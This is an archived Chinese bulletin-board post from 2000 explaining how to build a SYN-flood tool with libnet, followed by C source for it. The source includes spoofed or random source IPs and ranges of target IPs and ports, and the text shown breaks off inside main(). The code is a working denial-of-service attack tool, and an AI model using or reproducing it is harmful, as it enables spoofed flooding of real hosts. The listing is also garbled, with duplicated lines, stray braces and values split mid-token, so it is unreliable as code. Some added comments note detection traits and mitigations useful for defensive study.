<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="519.htm">上一层</a>][<a href="529.htm">下一篇</a>]
<hr><p align="left"><small>发信人: scz (小四), 信区: Security <br>
标 题: libnet使用举例(3) <br>
发信站: 武汉白云黄鹤站 (Thu Jul 27 15:45:11 2000), 站内信件 <br>
日期:2000-07-27 11:05 <br>
syn-flood的原理不再重复。需要通过命令行传递目标IP,应该允许指定单个IP或者 <br>
指定一个IP范围,这个可以统一成指定IP范围。还需要通过命令行传递目标端口,同 <br>
上,允许指定端口范围,指定单个PORT的时候就是把范围局限在一个端口上。无论什 <br>
么理由,都不应该直接使用本机(发起攻击的主机)IP作为源IP,所以需要通过命令行 <br>
指定一个伪造的源IP,在命令行上并未提供源IP的情况下,使用伪随机数发生器产生 <br>
伪随机源IP。对源端口的处理类似源IP。所谓flood,自然要考虑发送SYN报文的次数, <br>
也通过命令行参数指定。 <br>
下面举例是在i386/Linux平台上进行的,使用了getopt()函数长选项支持,如果转到 <br>
SPARC/Solaris平台上,一般是不支持长选项的,此次故意没有提供这个兼容性考虑, <br>
N年不用长选项,手痒痒,将就一下啦,如果要移植,换掉命令行参数处理部分即可。 <br>
-------------------------------------------------------------------------- <br>
/* <br>
* File : syn flood program for i386/Linux using libnet <br>
* Version: 0.99 alpha <br>
* Compile: gcc -O3 -o sf syn-flood.c `libnet-config --defines --cflags` `li <br>
bnet <br>
-config --libs` <br>
* Usage : ./sf --dil 192.168.10.2 --dih 192.168.10.2 --dpl 23 --dph 23 <br>
* Date : 2000-07-27 10:52 <br>
*/ <br>
/******************************************************************* <br>
* * <br>
* 头文件 * <br>
* * <br>
*******************************************************************/ <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <time.h> /* 使用time()产生随机化种子 */ <br>
#include <getopt.h> /* 使用getopt()长选项支持 */ <br>
#include <libnet.h> /* 使用libnet必须包含这个头文件 */ <br>
/******************************************************************* <br>
* * <br>
* Macro definitions * <br>
* * <br>
*******************************************************************/ <br>
/* NOTE(review): _GNU_SOURCE is defined after the #include lines above, so <br>
 * those headers were already processed without it. */ <br>
#define _GNU_SOURCE <br>
#define SUCCESS 0 <br>
#define FAILURE -1 <br>
#define DEFAULTSYNNUMBER 74 /* default number of SYN segments to send */ <br>
/* Four 4-byte character buffers named a-d; presumably the textual octets of a <br>
 * dotted-quad address - the code that fills them is outside this excerpt. */ <br>
struct ipoctet <br>
struct ipoctet <br>
{ <br>
char a[4]; <br>
char b[4]; <br>
char c[4]; <br>
char d[4]; <br>
}; <br>
/* Integer counterpart of struct ipoctet: one int per field a-d. */ <br>
struct ipocteti <br>
{ <br>
int a; <br>
int b; <br>
int c; <br>
int d; <br>
}; <br>
/******************************************************************* <br>
* * <br>
* Global variables * <br>
* * <br>
*******************************************************************/ <br>
/* State array used to initialise the pseudo-random number generator <br>
 * (passed to initstate()/setstate() in main). */ <br>
u_long randomState[64] = <br>
{ <br>
0x00000003, 0x32d9c024, 0x9b663182, 0x5da1f342, 0x7449e56b, 0xbeb1dbb0, 0xab <br>
5c59 <br>
18, 0x946554fd, <br>
0x8c2e680f, 0xeb3d799f, 0xb11ee0b7, 0x2d436b86, 0xda672e2a, 0x1588ca88, 0xe3 <br>
6973 <br>
5d, 0x904f35f7, <br>
0xd7158fd6, 0x6fa6f051, 0x616e6b96, 0xac94efdc, 0xde3b81e0, 0xdf0a6fb5, 0xf1 <br>
03bc <br>
02, 0x48f340fb, <br>
0x36413f93, 0xc622c298, 0xf5a42ab8, 0x8a88d77b, 0xf5ad9d0e, 0x8999220b, 0x27 <br>
fb47 <br>
b9, 0x9a319039, <br>
0x94102000, 0x9610000a, 0xc60a0000, 0x90022001, 0x8408e07f, 0x8528800a, 0x80 <br>
88e0 <br>
80, 0x02800004, <br>
0x9612c002, 0x10bffff9, 0x9402a007, 0x81c3e008, 0xd6224000, 0x86102000, 0x94 <br>
1000 <br>
03, 0xd60a0000, <br>
0x90022001, 0x840ae07f, 0x85288003, 0x94128002, 0x808ae080, 0x12bffffa, 0x86 <br>
00e0 <br>
07, 0x80a0e01f, <br>
0x18800006, 0x808ae040, 0x02800004, 0x84103fff, 0x85288003, 0x94128002, 0x81 <br>
c3e0 <br>
c3e0 <br>
08, 0xd4224000 <br>
}; <br>
/* Shared packet buffer written by synFlood(); NULL until it is allocated <br>
 * (the allocation call is not in this part of the listing). */ <br>
u_char * packet = NULL; <br>
/* No payload is carried: the datagram is exactly one IP header plus one TCP <br>
 * header, so every segment sent has the same, header-only length. */ <br>
size_t packet_size = LIBNET_IP_H + LIBNET_TCP_H; <br>
/* Raw socket descriptor that synFlood() hands to Libnet_write_ip(). */ <br>
int rawSocket; <br>
/******************************************************************* <br>
* * <br>
* Function prototypes * <br>
* * <br>
*******************************************************************/ <br>
/* The capitalised Libnet_* functions are this file's checked wrappers around <br>
 * the lower-case libnet_* library calls of the same name. */ <br>
void Libnet_do_checksum ( u_char * buf, int protocol, int len ); <br>
void Libnet_init_packet ( size_t p_size, u_char ** buf ); <br>
int Libnet_open_raw_sock ( int protocol ); <br>
void Libnet_write_ip ( int sock, u_char * packet, int len ); <br>
void synFlood ( u_long srcIp, u_short srcPort, u_long dstIp, u_short dstPort <br>
, u_ <br>
long synNumber ); <br>
void usage ( char * arg ); <br>
/*----------------------------------------------------------------------*/ <br>
/* Checked wrapper for libnet_do_checksum(): a return of -1 is reported through <br>
 * libnet_error() at LIBNET_ERR_FATAL severity. Nothing is returned to the <br>
 * caller. NOTE(review): whether a fatal-level libnet_error() terminates the <br>
 * process is decided inside libnet - confirm against the linked version. */ <br>
void Libnet_do_checksum ( u_char * buf, int protocol, int len ) <br>
{ <br>
{ <br>
if ( libnet_do_checksum( buf, protocol, len ) == -1 ) <br>
{ <br>
libnet_error( LIBNET_ERR_FATAL, "libnet_do_checksum failed\n" ); <br>
} <br>
return; <br>
} /* end of Libnet_do_checksum */ <br>
/* Checked wrapper for libnet_init_packet(): asks libnet for a packet buffer of <br>
 * p_size bytes, delivered through *buf. A return of -1 is reported through <br>
 * libnet_error() at LIBNET_ERR_FATAL severity; the wrapper itself returns <br>
 * nothing, so the caller cannot observe the failure directly. */ <br>
void Libnet_init_packet ( size_t p_size, u_char ** buf ) <br>
{ <br>
if ( libnet_init_packet( p_size, buf ) == -1 ) <br>
{ <br>
libnet_error( LIBNET_ERR_FATAL, "Can't initialize packet\n" ); <br>
} <br>
return; <br>
} /* end of Libnet_init_packet */ <br>
/* Checked wrapper for libnet_open_raw_sock(): opens a raw socket for the given <br>
 * protocol and returns its descriptor. A return of -1 is reported through <br>
 * libnet_error() at LIBNET_ERR_FATAL severity, with the protocol number printed <br>
 * in hex. Opening a raw socket normally requires elevated privilege (root or <br>
 * CAP_NET_RAW on Linux), so the program cannot run as an unprivileged user. */ <br>
int Libnet_open_raw_sock ( int protocol ) <br>
{ <br>
int s; <br>
if ( ( s = libnet_open_raw_sock( protocol ) ) == -1 ) <br>
{ <br>
libnet_error( LIBNET_ERR_FATAL, "Can't open raw socket %08x\n", prot <br>
ocol <br>
); <br>
); <br>
} <br>
return( s ); <br>
} /* end of Libnet_open_raw_sock */ <br>
/* Checked wrapper for libnet_write_ip(): writes len bytes of packet to sock. <br>
 * A result smaller than len (which includes an error return) is only logged <br>
 * at LIBNET_ERR_WARNING severity; the caller is not told and carries on. */ <br>
void Libnet_write_ip ( int sock, u_char * packet, int len ) <br>
{ <br>
int w; <br>
if ( ( w = libnet_write_ip( sock, packet, len ) ) < len ) <br>
{ <br>
libnet_error( LIBNET_ERR_WARNING, "libnet_write_ip only wrote %d byt <br>
es\n <br>
", w ); <br>
} <br>
return; <br>
} /* end of Libnet_write_ip */ <br>
/* Emits synNumber TCP SYN segments from srcIp to dstIp:dstPort over rawSocket, <br>
 * reusing the global packet buffer. The IP header is built once before the <br>
 * loop; only the TCP header is rebuilt per segment, with source port <br>
 * srcPort + s truncated to 16 bits. <br>
 * <br>
 * Detection note: within one call every segment therefore carries the same <br>
 * source address, the same IP ID as built here, TTL 255, ToS IPTOS_LOWDELAY, <br>
 * sequence number 0x51211314, window 1024 and a zero ACK field; only the <br>
 * source port (and the checksum that depends on it) changes, by one per <br>
 * segment. Those constants are what a filter or IDS rule can match on. SYN <br>
 * cookies on the listener and ingress source-address filtering (BCP 38) <br>
 * address the half-open-state and spoofing aspects respectively. */ <br>
void synFlood ( u_long srcIp, u_short srcPort, u_long dstIp, u_short dstPort <br>
, u_ <br>
long synNumber ) <br>
{ <br>
u_long s; <br>
/* build the IP header (done once, outside the loop) */ <br>
libnet_build_ip( LIBNET_TCP_H, /* length of the IP payload */ <br>
IPTOS_LOWDELAY, /* IP tos */ <br>
( u_short )random(), /* IP ID */ <br>
0, /* frag stuff */ <br>
255, /* TTL */ <br>
IPPROTO_TCP, /* upper-layer protocol */ <br>
srcIp, /* big-endian order */ <br>
dstIp, /* destination IP */ <br>
NULL, /* no options */ <br>
0, /* option length zero */ <br>
packet ); /* points at the IP header */ <br>
for ( s = 0; s < synNumber; s++ ) <br>
{ <br>
// Each segment is given a distinct 5-tuple by advancing the source port by <br>
// one per iteration. The source IP is deliberately held constant; the <br>
// author's stated reason is the case where source addresses are restricted. <br>
/* build the TCP header */ <br>
libnet_build_tcp( ( u_short )( srcPort + s ), /* source port */ <br>
dstPort, /* destination port */ <br>
0x51211314, /* seq num */ <br>
0, /* ack num */ <br>
TH_SYN, /* control flags */ <br>
1024, /* window size */ <br>
0, /* urgent pointer */ <br>
NULL, /* payload (none) */ <br>
0, /* payload length */ <br>
packet + LIBNET_IP_H ); /* points at the TCP header */ <br>
/* compute the TCP checksum; the IP checksum is left to the kernel */ <br>
Libnet_do_checksum( packet, IPPROTO_TCP, LIBNET_TCP_H ); <br>
/* send the SYN segment */ <br>
Libnet_write_ip( rawSocket, packet, packet_size ); <br>
// This progress output is slow; it should stay disabled unless debugging. <br>
// fprintf( stderr, "." ); <br>
} /* end of for */ <br>
return; <br>
} /* end of synFlood */ <br>
/* Prints the option summary to stderr, with arg substituted as the program <br>
 * name, then terminates the process via exit( FAILURE ). Does not return. */ <br>
void usage ( char * arg ) <br>
{ <br>
fprintf( stderr, " Usage: %s [--si srcIp] [--dil dstIpLow] [--dih dstIpH <br>
igh] <br>
\n\t" <br>
"[--sp srcPort] [--dpl dstPortLow] [--dph dstPortHigh]\ <br>
n\t" <br>
"[--num synNumber]\n", arg ); <br>
exit( FAILURE ); <br>
} /* end of usage */ <br>
int main ( int argc, char * argv[] ) <br>
{ <br>
#define LONGOPTIONCHAR '-' <br>
/* 定义长选项 */ <br>
static struct option longOption[] = <br>
{ <br>
{ "si", 1, 0, LONGOPTIONCHAR }, /* 源IP */ <br>
{ "dil", 1, 0, LONGOPTIONCHAR }, /* 目标IP低端 */ <br>
{ "dih", 1, 0, LONGOPTIONCHAR }, /* 目标IP高端 */ <br>
{ "sp", 1, 0, LONGOPTIONCHAR }, /* 源端口 */ <br>
{ "dpl", 1, 0, LONGOPTIONCHAR }, /* 目标端口低端 */ <br>
{ "dph", 1, 0, LONGOPTIONCHAR }, /* 目标端口高端 */ <br>
{ "num", 1, 0, LONGOPTIONCHAR }, /* SYN报文数目 */ <br>
{ 0, 0, 0, 0 } <br>
}; <br>
int longOptionIndex = 0; /* 用于处理长选项 */ <br>
int i, j, a, b, c, d; <br>
struct ipoctet ipstart, ipend; <br>
struct ipocteti ipstarti, ipendi; <br>
struct ipoctet * pipstart = &ipstart; <br>
struct ipoctet * pipend = &ipend; <br>
/* 源IP使用使用网络字节序指定 */ <br>
u_long srcIp = 0xffffffff; <br>
u_long dstIp; <br>
u_short srcPort = 0xffff; <br>
u_short dstPort; <br>
u_short dstPortLow = 1; /* 缺省端口范围1- <br>
1024 <br>
*/ <br>
u_short dstPortHigh = 1024; <br>
u_long synNumber = DEFAULTSYNNUMBER; /* SYN报文数目 <br>
*/ <br>
unsigned int randomSeed = ( unsigned int )time( NULL ); <br>
if ( argc == 1 ) <br>
{ <br>
usage( argv[0] ); <br>
} <br>
initstate( randomSeed, ( char * )randomState, 128 ); <br>
setstate( ( char * )randomState ); <br>
opterr = 0; /* don't want getopt() writing to stderr */ <br>
while ( ( c = getopt_long( argc, argv, "h", longOption, &longOptionIndex <br>
) <br>
) != EOF ) <br>
{ <br>
{ <br>
switch ( c ) <br>
{ <br>
case LONGOPTIONCHAR: /* 处理长选项 */ <br>
/* <br>
fprintf( stderr, "option %s", longOption[ longOptionIndex ].name <br>
); <br>
if ( optarg ) <br>
{ <br>
fprintf( stderr, " with arg %s", optarg ); <br>
} <br>
fprintf( stderr, "\n" ); <br>
*/ <br>
if ( optarg ) <br>
{ <br>